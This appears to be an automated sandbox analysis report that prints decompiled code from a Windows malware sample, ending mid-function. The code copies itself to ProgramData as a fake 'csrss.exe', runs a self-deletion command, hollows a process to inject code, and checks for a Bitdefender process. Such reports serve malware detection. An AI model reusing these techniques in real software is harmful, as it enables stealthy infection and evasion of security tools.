                                                                                                        • Instruction ID: ad6f6dec5bebba37654f7df4e95756a07402986942676bd2af918ef8c042ffe8
                                                                                                        • Opcode Fuzzy Hash: 671f31387eb76ffe7eedd1e7a5d421db0a94a72204410f49f2046076568151df
                                                                                                        • Instruction Fuzzy Hash: 77615FB2D1021D66CF50E7A2DC45ECB73AC5F6454CF1408ABA509E3021FA75EB98CBA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 014676A0, Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 284fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E014676A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v1116;
				char _v1636;
				short _v4196;
				void* _t53;
				WCHAR* _t54;
				WCHAR* _t56;
				WCHAR* _t58;
				WCHAR* _t59;
				WCHAR* _t60;
				signed int _t62;
				WCHAR* _t66;
				WCHAR* _t81;
				WCHAR* _t82;
				void* _t87;
				void* _t88;
				WCHAR* _t103;
				WCHAR* _t107;
				WCHAR* _t110;
				int _t115;
				signed int _t120;
				WCHAR* _t121;
				WCHAR* _t122;
				void* _t140;
				intOrPtr* _t141;
				WCHAR* _t143;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t155;

				_t130 = __ecx;
				_t148 = _t147 - 0x1060;
				if( *0x1632e00 >= 0xc350) {
					L39:
					__eflags = 0;
					return 0;
				} else {
					_t157 =  *0x1631c4c;
					if( *0x1631c4c == 0) {
						goto L39;
					} else {
						E01461BB0( &_v92, 0, 0x44);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x14], xmm0");
						_t53 = E01467C30(_t130, __edx, _t157, _a4,  &_v8);
						_t135 = _t53;
						_t149 = _t148 + 0x14;
						if(_t53 != 0) {
							_t141 = __imp__GetLongPathNameW;
							_t54 =  *_t141("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x200, _t140);
							__eflags = _t54;
							if(_t54 == 0) {
								L37:
								_push(_v8);
								goto L38;
							} else {
								__eflags = _t54 - 0x200;
								if(_t54 > 0x200) {
									goto L37;
								} else {
									_t56 = E01461A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "C:\ProgramData\LKBNMTFJgl");
									_t149 = _t149 + 8;
									__eflags = _t56;
									if(_t56 != 0) {
										L10:
										_t58 = GetTempPathW(0x200,  &_v1116);
										__eflags = _t58;
										if(_t58 == 0) {
											goto L37;
										} else {
											__eflags = _t58 - 0x200;
											if(_t58 > 0x200) {
												goto L37;
											} else {
												_t59 =  &_v1116;
												_t60 =  *_t141(_t59, _t59, 0x200);
												__eflags = _t60;
												if(_t60 == 0) {
													goto L37;
												} else {
													__eflags = _t60 - 0x200;
													if(_t60 > 0x200) {
														goto L37;
													} else {
														_t62 = E01461B40( &_v1116);
														_t151 = _t149 + 4;
														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
															 *((short*)(_t146 + E01461B40( &_v1116) * 2 - 0x458)) = 0x5c;
															_t120 = E01461B40( &_v1116);
															_t151 = _t151 + 8;
															_t130 = 0;
															__eflags = 0;
															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
														}
														E01461970( &_v1116, "csrss.exe");
														_t152 = _t151 + 8;
														goto L17;
													}
												}
											}
										}
									} else {
										_t121 = E01461A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", L"ProgramData");
										_t149 = _t149 + 8;
										__eflags = _t121;
										if(_t121 != 0) {
											goto L10;
										} else {
											_t122 = E01461A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x163204c);
											_t149 = _t149 + 8;
											__eflags = _t122;
											if(_t122 != 0) {
												goto L10;
											} else {
												E01461A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
												E01461970( &_v1116, "\\");
												E01461970( &_v1116, "csrss.exe");
												_t152 = _t149 + 0x18;
												E01466D50();
												L17:
												_t66 = E014687C0( &_v1116, _v8, _t135);
												_t149 = _t152 + 0xc;
												_push(_v8);
												__eflags = _t66;
												if(_t66 == 0) {
													L38:
													E01461510();
													 *0x1632e00 =  &(( *0x1632e00)[0]);
													__eflags =  *0x1632e00;
													goto L39;
												} else {
													E01461510();
													_t143 = E014615E0(0x24);
													_t153 = _t149 + 8;
													__eflags = _t143;
													if(_t143 != 0) {
														_t81 = E01468B20( &_v1116, _t143);
														_t155 = _t153 + 8;
														__eflags = _t81;
														if(_t81 != 0) {
															_t143[0x10] = 0;
															_t82 = E01461740(_t143, _a16);
															_t155 = _t155 + 8;
															_push(_t143);
															__eflags = _t82;
															if(_t82 != 0) {
																goto L21;
															} else {
																E01461510();
																_t153 = _t155 + 4;
																__eflags =  *0x1631300;
																if( *0x1631300 == 0) {
																	L29:
																	__eflags = _a12;
																	if(_a12 != 0) {
																		E01468730(_a8);
																		_t153 = _t153 + 4;
																	}
																	 *0x1632118 = 1;
																	_t87 =  *0x163211c;
																	__eflags = _t87;
																	if(_t87 == 0) {
																		L33:
																		_t88 =  *0x1632120;
																		__eflags = _t88;
																		if(_t88 != 0) {
																			TerminateThread(_t88, 0);
																		}
																		E01461A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
																		E01461970( &_v4196, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe");
																		E01461970( &_v4196, L"\" & \"");
																		E01461970( &_v4196,  &_v1116);
																		E01461970( &_v4196, "\"");
																		_t153 = _t153 + 0x28;
																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
																		__eflags = _t103;
																		if(_t103 != 0) {
																			CloseHandle(_v24.hThread);
																			CloseHandle(_v24);
																			ExitProcess(0);
																		}
																	} else {
																		_t107 = WaitForSingleObject(_t87, 0xea60);
																		__eflags = _t107;
																		if(_t107 == 0) {
																			goto L33;
																		}
																	}
																} else {
																	_t143 = E014615E0(0x400);
																	_t153 = _t153 + 4;
																	__eflags = _t143;
																	if(_t143 != 0) {
																		_t110 = E01467FA0(_t130, _t143, 0x146aad0, 7);
																		_t155 = _t153 + 0xc;
																		__eflags = _t110;
																		if(_t110 == 0) {
																			goto L20;
																		} else {
																			E01461970(_t143, "\\");
																			E01461970(_t143, "viTRMUuKeV");
																			E01461970(_t143, L".url");
																			_t155 = _t155 + 0x18;
																			E01466D70();
																			_t115 = DeleteFileW(_t143);
																			_push(_t143);
																			__eflags = _t115;
																			if(_t115 == 0) {
																				goto L21;
																			} else {
																				E01461510();
																				_t153 = _t155 + 4;
																				goto L29;
																			}
																		}
																	}
																}
															}
														} else {
															L20:
															_push(_t143);
															L21:
															E01461510();
															_t153 = _t155 + 4;
														}
													}
													DeleteFileW( &_v1116);
													 *0x1632e00 =  &(( *0x1632e00)[0]);
													E01461A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
													E01461970( &_v1636, "\\");
													E01461970( &_v1636, "csrss.exe");
													E01466340( &_v1636);
													__eflags = 0;
													return 0;
												}
											}
										}
									}
								}
							}
						} else {
							 *0x1632e00 =  &(( *0x1632e00)[0]);
							return _t53;
						}
					}
				}
			}







































                                                                                                        0x014676a0
                                                                                                        0x014676a8
                                                                                                        0x014676b5
                                                                                                        0x01467a92
                                                                                                        0x01467a92
                                                                                                        0x01467a97
                                                                                                        0x014676bb
                                                                                                        0x014676bb
                                                                                                        0x014676c3
                                                                                                        0x00000000
                                                                                                        0x014676c9
                                                                                                        0x014676d2
                                                                                                        0x014676da
                                                                                                        0x014676e1
                                                                                                        0x014676e5
                                                                                                        0x014676ea
                                                                                                        0x014676ec
                                                                                                        0x014676f1
                                                                                                        0x01467700
                                                                                                        0x01467715
                                                                                                        0x01467717
                                                                                                        0x01467719
                                                                                                        0x01467a7e
                                                                                                        0x01467a7e
                                                                                                        0x00000000
                                                                                                        0x0146771f
                                                                                                        0x0146771f
                                                                                                        0x01467724
                                                                                                        0x00000000
                                                                                                        0x0146772a
                                                                                                        0x01467734
                                                                                                        0x01467739
                                                                                                        0x0146773c
                                                                                                        0x0146773e
                                                                                                        0x014677ac
                                                                                                        0x014677b8
                                                                                                        0x014677be
                                                                                                        0x014677c0
                                                                                                        0x00000000
                                                                                                        0x014677c6
                                                                                                        0x014677c6
                                                                                                        0x014677cb
                                                                                                        0x00000000
                                                                                                        0x014677d1
                                                                                                        0x014677d6
                                                                                                        0x014677de
                                                                                                        0x014677e0
                                                                                                        0x014677e2
                                                                                                        0x00000000
                                                                                                        0x014677e8
                                                                                                        0x014677e8
                                                                                                        0x014677ed
                                                                                                        0x00000000
                                                                                                        0x014677f3
                                                                                                        0x014677fa
                                                                                                        0x014677ff
                                                                                                        0x01467802
                                                                                                        0x0146780b
                                                                                                        0x0146781e
                                                                                                        0x0146782d
                                                                                                        0x01467832
                                                                                                        0x01467835
                                                                                                        0x01467835
                                                                                                        0x01467837
                                                                                                        0x01467837
                                                                                                        0x0146784b
                                                                                                        0x01467850
                                                                                                        0x00000000
                                                                                                        0x01467850
                                                                                                        0x014677ed
                                                                                                        0x014677e2
                                                                                                        0x014677cb
                                                                                                        0x01467740
                                                                                                        0x0146774a
                                                                                                        0x0146774f
                                                                                                        0x01467752
                                                                                                        0x01467754
                                                                                                        0x00000000
                                                                                                        0x01467756
                                                                                                        0x01467760
                                                                                                        0x01467765
                                                                                                        0x01467768
                                                                                                        0x0146776a
                                                                                                        0x00000000
                                                                                                        0x0146776c
                                                                                                        0x01467778
                                                                                                        0x01467789
                                                                                                        0x0146779a
                                                                                                        0x0146779f
                                                                                                        0x014677a2
                                                                                                        0x01467853
                                                                                                        0x0146785e
                                                                                                        0x01467863
                                                                                                        0x01467866
                                                                                                        0x01467869
                                                                                                        0x0146786b
                                                                                                        0x01467a81
                                                                                                        0x01467a81
                                                                                                        0x01467a89
                                                                                                        0x01467a89
                                                                                                        0x00000000
                                                                                                        0x01467871
                                                                                                        0x01467871
                                                                                                        0x01467883
                                                                                                        0x01467885
                                                                                                        0x01467888
                                                                                                        0x0146788a
                                                                                                        0x01467894
                                                                                                        0x01467899
                                                                                                        0x0146789c
                                                                                                        0x0146789e
                                                                                                        0x01467906
                                                                                                        0x0146790b
                                                                                                        0x01467910
                                                                                                        0x01467913
                                                                                                        0x01467914
                                                                                                        0x01467916
                                                                                                        0x00000000
                                                                                                        0x01467918
                                                                                                        0x01467918
                                                                                                        0x0146791d
                                                                                                        0x01467920
                                                                                                        0x01467927
                                                                                                        0x01467995
                                                                                                        0x01467995
                                                                                                        0x01467999
                                                                                                        0x0146799e
                                                                                                        0x014679a3
                                                                                                        0x014679a3
                                                                                                        0x014679ad
                                                                                                        0x014679af
                                                                                                        0x014679b4
                                                                                                        0x014679b6
                                                                                                        0x014679cc
                                                                                                        0x014679cc
                                                                                                        0x014679d1
                                                                                                        0x014679d3
                                                                                                        0x014679d8
                                                                                                        0x014679d8
                                                                                                        0x014679ea
                                                                                                        0x014679fb
                                                                                                        0x01467a0c
                                                                                                        0x01467a1f
                                                                                                        0x01467a30
                                                                                                        0x01467a35
                                                                                                        0x01467a58
                                                                                                        0x01467a5e
                                                                                                        0x01467a60
                                                                                                        0x01467a6f
                                                                                                        0x01467a74
                                                                                                        0x01467a78
                                                                                                        0x01467a78
                                                                                                        0x014679b8
                                                                                                        0x014679be
                                                                                                        0x014679c4
                                                                                                        0x014679c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014679c6
                                                                                                        0x01467929
                                                                                                        0x01467933
                                                                                                        0x01467935
                                                                                                        0x01467938
                                                                                                        0x0146793a
                                                                                                        0x01467948
                                                                                                        0x0146794d
                                                                                                        0x01467950
                                                                                                        0x01467952
                                                                                                        0x00000000
                                                                                                        0x01467958
                                                                                                        0x0146795e
                                                                                                        0x01467969
                                                                                                        0x01467974
                                                                                                        0x01467979
                                                                                                        0x0146797c
                                                                                                        0x01467982
                                                                                                        0x01467984
                                                                                                        0x01467985
                                                                                                        0x01467987
                                                                                                        0x00000000
                                                                                                        0x0146798d
                                                                                                        0x0146798d
                                                                                                        0x01467992
                                                                                                        0x00000000
                                                                                                        0x01467992
                                                                                                        0x01467987
                                                                                                        0x01467952
                                                                                                        0x0146793a
                                                                                                        0x01467927
                                                                                                        0x014678a0
                                                                                                        0x014678a0
                                                                                                        0x014678a0
                                                                                                        0x014678a1
                                                                                                        0x014678a1
                                                                                                        0x014678a6
                                                                                                        0x014678a6
                                                                                                        0x0146789e
                                                                                                        0x014678b0
                                                                                                        0x014678b2
                                                                                                        0x014678c5
                                                                                                        0x014678d6
                                                                                                        0x014678e7
                                                                                                        0x014678f3
                                                                                                        0x014678fb
                                                                                                        0x01467902
                                                                                                        0x01467902
                                                                                                        0x0146786b
                                                                                                        0x0146776a
                                                                                                        0x01467754
                                                                                                        0x0146773e
                                                                                                        0x01467724
                                                                                                        0x014676f3
                                                                                                        0x014676f3
                                                                                                        0x014676fe
                                                                                                        0x014676fe
                                                                                                        0x014676f1
                                                                                                        0x014676c3

                                                                                                        APIs
                                                                                                          • Part of subcall function 01467C30: InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 01467C87
                                                                                                        • GetLongPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,00000200,?,?,?,?,?,?), ref: 01467715
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 014678B0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CrackDeleteFileInternetLongNamePath
                                                                                                        • String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$ProgramData$\$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV
                                                                                                        • API String ID: 3724707802-805812302
                                                                                                        • Opcode ID: c4d2c6ce46f585a3dd3308ae4562a4ad25ca0f4c42f9eaea2c7b7543b9ddf4c6
                                                                                                        • Instruction ID: e397efedccce0264f7966f67d68d72eaaa3801d52d864ae1006c483f3e833279
                                                                                                        • Opcode Fuzzy Hash: c4d2c6ce46f585a3dd3308ae4562a4ad25ca0f4c42f9eaea2c7b7543b9ddf4c6
                                                                                                        • Instruction Fuzzy Hash: 709109B1D0020966EB20A7E6DC05FDF776C9F60A4EF04006FEA05E3171FA75A654C6A3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01465B80, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 237threadsleepprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E01465B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				char _v112;
				struct _CONTEXT _v828;
				intOrPtr _t62;
				void* _t70;
				void* _t72;
				void* _t81;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t90;
				void* _t94;
				void* _t95;
				void* _t108;
				void* _t115;
				void* _t117;
				void _t120;
				intOrPtr _t123;
				void* _t126;
				void* _t132;
				void* _t133;
				intOrPtr* _t136;
				void* _t137;
				void* _t138;
				void* _t142;
				void* _t143;

				_t115 = __ebx;
				E01461BB0( &(_v828.Dr0), 0, 0x2c8);
				_v28 = 0;
				_t138 = _t137 + 0xc;
				_v32 = 0;
				_v828.ContextFlags = 0x10007;
				_t142 =  *0x146c038 - 0x5a4d; // 0x6b7d
				if(_t142 == 0) {
					L3:
					_t62 =  *0x146c074; // 0x383538b7
					__eflags =  *((intOrPtr*)(_t62 + 0x146c038)) - 0x4550;
					_t6 = _t62 + 0x146c038; // 0x397bf8ef
					_t126 = _t6;
					if( *((intOrPtr*)(_t62 + 0x146c038)) != 0x4550) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						E01461670( &_v112, 0, 0x44);
						E01461670( &_v20, 0, 0x10);
						_v112 = 0x44;
						__eflags =  *0x1631bb8;
						_push( &_v20);
						_push( &_v112);
						_push(0);
						_push(0);
						if( *0x1631bb8 == 0) {
							_push(0x14);
						} else {
							_push(0x800000c);
						}
						_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
						__eflags = _t70;
						if(_t70 == 0) {
							goto L27;
						} else {
							_push(_t115);
							_t72 = GetThreadContext(_v16,  &_v828);
							__eflags = _t72;
							if(_t72 == 0) {
								L26:
								TerminateProcess(_v20, 0);
								CloseHandle(_v16);
								CloseHandle(_v20);
								__eflags = 0;
								return 0;
							} else {
								_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
								__eflags = _t81;
								if(_t81 == 0) {
									goto L26;
								} else {
									_t123 =  *((intOrPtr*)(_t126 + 0x34));
									_t120 = _v28;
									__eflags = _t120 - _t123;
									if(__eflags < 0) {
										L13:
										_t82 = E014672C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
										_t132 = _t82;
										_v24 = _t132;
										__eflags = _t132;
										if(_t132 == 0) {
											goto L26;
										} else {
											asm("cdq");
											_t124 =  &_v36;
											_v44 = _t82;
											_v40 = _t123;
											_t84 = E014674D0(_t82,  &_v36, _v20, _t82, _t123, 0x146c038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
											__eflags = _t84;
											if(_t84 == 0) {
												goto L26;
											} else {
												_t85 =  *(_t126 + 0x14) & 0x0000ffff;
												_t117 = 0;
												__eflags = 0 -  *(_t126 + 6);
												if(0 >=  *(_t126 + 6)) {
													L20:
													_t42 = _t126 + 0x34; // 0x397bf923
													_t90 = E014674D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
													__eflags = _t90;
													if(_t90 == 0) {
														goto L26;
													} else {
														_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
														_t94 = SetThreadContext(_v16,  &_v828);
														__eflags = _t94;
														if(_t94 == 0) {
															goto L26;
														} else {
															_t95 = E014671A0(0, _t124, _v16);
															__eflags = _t95;
															if(_t95 == 0) {
																goto L26;
															} else {
																Sleep(0x1388);
																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
																__eflags = _t133;
																if(_t133 != 0) {
																	E01461BB0(_t133, 0, 0x138);
																	E014674D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
																	VirtualFree(_t133, 0, 0x8000);
																}
																CloseHandle(_v16);
																CloseHandle(_v20);
																return _v12;
															}
														}
													}
												} else {
													_t34 = _t126 + 0x2c; // 0x397bf91b
													_t136 = _t34 + _t85;
													asm("o16 nop [eax+eax]");
													while(1) {
														_t108 = E014674D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x146c038,  *((intOrPtr*)(_t136 - 4)), 0);
														__eflags = _t108;
														if(_t108 == 0) {
															goto L26;
														}
														_t117 = _t117 + 1;
														_t136 = _t136 + 0x28;
														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
															continue;
														} else {
															_t132 = _v24;
															goto L20;
														}
														goto L28;
													}
													goto L26;
												}
											}
										}
									} else {
										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
										if(__eflags > 0) {
											goto L13;
										} else {
											__eflags = E01467120(_t123, _v20, _t120, 0);
											if(__eflags != 0) {
												goto L26;
											} else {
												goto L13;
											}
										}
									}
								}
							}
						}
					}
				} else {
					E01461CE0("0125789244697858", 0x10, 0x146c038, 0xe7c00);
					_t138 = _t138 + 0x10;
					_t143 =  *0x146c038 - 0x5a4d; // 0x6b7d
					if(_t143 == 0) {
						goto L3;
					} else {
						return 0;
					}
				}
				L28:
			}





































                                                                                                        0x01465b80
                                                                                                        0x01465b98
                                                                                                        0x01465ba2
                                                                                                        0x01465ba9
                                                                                                        0x01465bac
                                                                                                        0x01465bb3
                                                                                                        0x01465bbd
                                                                                                        0x01465bc4
                                                                                                        0x01465bef
                                                                                                        0x01465bef
                                                                                                        0x01465bf4
                                                                                                        0x01465bff
                                                                                                        0x01465bff
                                                                                                        0x01465c05
                                                                                                        0x01465e53
                                                                                                        0x01465e54
                                                                                                        0x01465e5a
                                                                                                        0x01465c0b
                                                                                                        0x01465c13
                                                                                                        0x01465c20
                                                                                                        0x01465c28
                                                                                                        0x01465c2f
                                                                                                        0x01465c39
                                                                                                        0x01465c3d
                                                                                                        0x01465c3e
                                                                                                        0x01465c40
                                                                                                        0x01465c42
                                                                                                        0x01465c4b
                                                                                                        0x01465c44
                                                                                                        0x01465c44
                                                                                                        0x01465c44
                                                                                                        0x01465c58
                                                                                                        0x01465c5e
                                                                                                        0x01465c60
                                                                                                        0x00000000
                                                                                                        0x01465c66
                                                                                                        0x01465c66
                                                                                                        0x01465c71
                                                                                                        0x01465c77
                                                                                                        0x01465c79
                                                                                                        0x01465e2f
                                                                                                        0x01465e34
                                                                                                        0x01465e43
                                                                                                        0x01465e48
                                                                                                        0x01465e4c
                                                                                                        0x01465e52
                                                                                                        0x01465c7f
                                                                                                        0x01465c96
                                                                                                        0x01465c9c
                                                                                                        0x01465c9e
                                                                                                        0x00000000
                                                                                                        0x01465ca4
                                                                                                        0x01465ca4
                                                                                                        0x01465ca7
                                                                                                        0x01465caa
                                                                                                        0x01465cac
                                                                                                        0x01465cca
                                                                                                        0x01465cdc
                                                                                                        0x01465ce1
                                                                                                        0x01465ce3
                                                                                                        0x01465ce6
                                                                                                        0x01465ce8
                                                                                                        0x00000000
                                                                                                        0x01465cee
                                                                                                        0x01465cee
                                                                                                        0x01465cf3
                                                                                                        0x01465cf6
                                                                                                        0x01465cfd
                                                                                                        0x01465d0a
                                                                                                        0x01465d0f
                                                                                                        0x01465d11
                                                                                                        0x00000000
                                                                                                        0x01465d17
                                                                                                        0x01465d17
                                                                                                        0x01465d1d
                                                                                                        0x01465d1f
                                                                                                        0x01465d23
                                                                                                        0x01465d65
                                                                                                        0x01465d6b
                                                                                                        0x01465d7e
                                                                                                        0x01465d83
                                                                                                        0x01465d85
                                                                                                        0x00000000
                                                                                                        0x01465d8b
                                                                                                        0x01465d90
                                                                                                        0x01465da0
                                                                                                        0x01465da6
                                                                                                        0x01465da8
                                                                                                        0x00000000
                                                                                                        0x01465dae
                                                                                                        0x01465db1
                                                                                                        0x01465db6
                                                                                                        0x01465db8
                                                                                                        0x00000000
                                                                                                        0x01465dba
                                                                                                        0x01465dbf
                                                                                                        0x01465dd9
                                                                                                        0x01465ddb
                                                                                                        0x01465ddd
                                                                                                        0x01465de7
                                                                                                        0x01465e02
                                                                                                        0x01465e0f
                                                                                                        0x01465e0f
                                                                                                        0x01465e1e
                                                                                                        0x01465e23
                                                                                                        0x01465e2e
                                                                                                        0x01465e2e
                                                                                                        0x01465db8
                                                                                                        0x01465da8
                                                                                                        0x01465d25
                                                                                                        0x01465d25
                                                                                                        0x01465d28
                                                                                                        0x01465d2a
                                                                                                        0x01465d30
                                                                                                        0x01465d49
                                                                                                        0x01465d4e
                                                                                                        0x01465d50
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01465d5a
                                                                                                        0x01465d5b
                                                                                                        0x01465d5e
                                                                                                        0x01465d60
                                                                                                        0x00000000
                                                                                                        0x01465d62
                                                                                                        0x01465d62
                                                                                                        0x00000000
                                                                                                        0x01465d62
                                                                                                        0x00000000
                                                                                                        0x01465d60
                                                                                                        0x00000000
                                                                                                        0x01465d30
                                                                                                        0x01465d23
                                                                                                        0x01465d11
                                                                                                        0x01465cae
                                                                                                        0x01465cb3
                                                                                                        0x01465cb5
                                                                                                        0x00000000
                                                                                                        0x01465cb7
                                                                                                        0x01465cc2
                                                                                                        0x01465cc4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01465cc4
                                                                                                        0x01465cb5
                                                                                                        0x01465cac
                                                                                                        0x01465c9e
                                                                                                        0x01465c79
                                                                                                        0x01465c60
                                                                                                        0x01465bc6
                                                                                                        0x01465bd7
                                                                                                        0x01465bdc
                                                                                                        0x01465bdf
                                                                                                        0x01465be6
                                                                                                        0x00000000
                                                                                                        0x01465be8
                                                                                                        0x01465bee
                                                                                                        0x01465bee
                                                                                                        0x01465be6
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000014,00000000,00000000,00000044,?,?,?,?,?,?,014649E6), ref: 01465C58
                                                                                                        • GetThreadContext.KERNEL32(014649E6,00010007,00000000,?,?,?,?,?,014649E6,?,?,?), ref: 01465C71
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,014649E6,?,?,?), ref: 01465C96
                                                                                                        • SetThreadContext.KERNEL32(014649E6,00010007,?,?,00000000,397BF923,00000004,00000000,?,00000000,?,0146C038,?,00000000,?,?), ref: 01465DA0
                                                                                                        • Sleep.KERNEL32(00001388,014649E6,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 01465DBF
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 01465DD3
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,014649E6,00000000,00000138,?,?,00003000,00000040), ref: 01465E0F
                                                                                                        • CloseHandle.KERNEL32(014649E6,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 01465E1E
                                                                                                        • CloseHandle.KERNEL32(?,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 01465E23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
                                                                                                        • String ID: 0125789244697858$D
                                                                                                        • API String ID: 1428767187-3232960292
                                                                                                        • Opcode ID: 1888e36219e5541789a3cce8130b5b3a3536d0f2db1fbd84d212827a6935d789
                                                                                                        • Instruction ID: 83ca7352130f6704b683d03c8413d5eb356d62c219a97476855fd11a72ce4bf5
                                                                                                        • Opcode Fuzzy Hash: 1888e36219e5541789a3cce8130b5b3a3536d0f2db1fbd84d212827a6935d789
                                                                                                        • Instruction Fuzzy Hash: 0B81B271A40215BBEF209B94DC45FEEBBBCFB14748F044156FA04FA1A0E7B1A950CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01466A40, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 180processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E01466A40(void* __ecx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				char _v612;
				char _v740;
				short _v1780;
				char _v5876;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t38;
				int _t48;
				void* _t54;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t76;
				signed int _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t84;

				_t71 = __ecx;
				E01461BB0( &_v5876, 0, 0x1000);
				_v8 = 0;
				E01461BB0( &_v740, 0, 0x288);
				E01461670( &_v740, 0, 0x288);
				_t74 = _a4;
				E01461A00( &_v612, _a4);
				_t38 = E01467ED0(_a4);
				_t82 = _t81 + 0x30;
				if(_t38 == 0) {
					return _t38;
				}
				_push(_t68);
				_push(_t76);
				if(E01468DD0() == 0) {
					L22:
					E01461BB0( &_v92, 0, 0x44);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x14], xmm0");
					E01461A00( &_v1780, L"cmd.exe /C WScript \"");
					E01461970( &_v1780, _t74);
					E01461970( &_v1780, "\"");
					_t48 = E01467ED0(_t74);
					if(_t48 != 0) {
						CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
						CloseHandle(_v24.hThread);
						_t48 = CloseHandle(_v24);
					}
					L24:
					return _t48;
				}
				_t54 = E01467EF0("bdagent.exe");
				_t84 = _t82 + 4;
				if(_t54 != 0) {
					L10:
					_push(0x1000);
					_push( &_v5876);
					if( *0x1631314 == 0) {
						_push(0);
						_t48 = E014629E0( &_v740, 0x1460000, E014680E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E01466CA0);
						_t82 = _t84 + 0x24;
						if(_t48 == 0 || _v8 == 0) {
							goto L22;
						} else {
							goto L24;
						}
					}
					_push(1);
					_t70 = E014680E0(_t68, _t74, _t76);
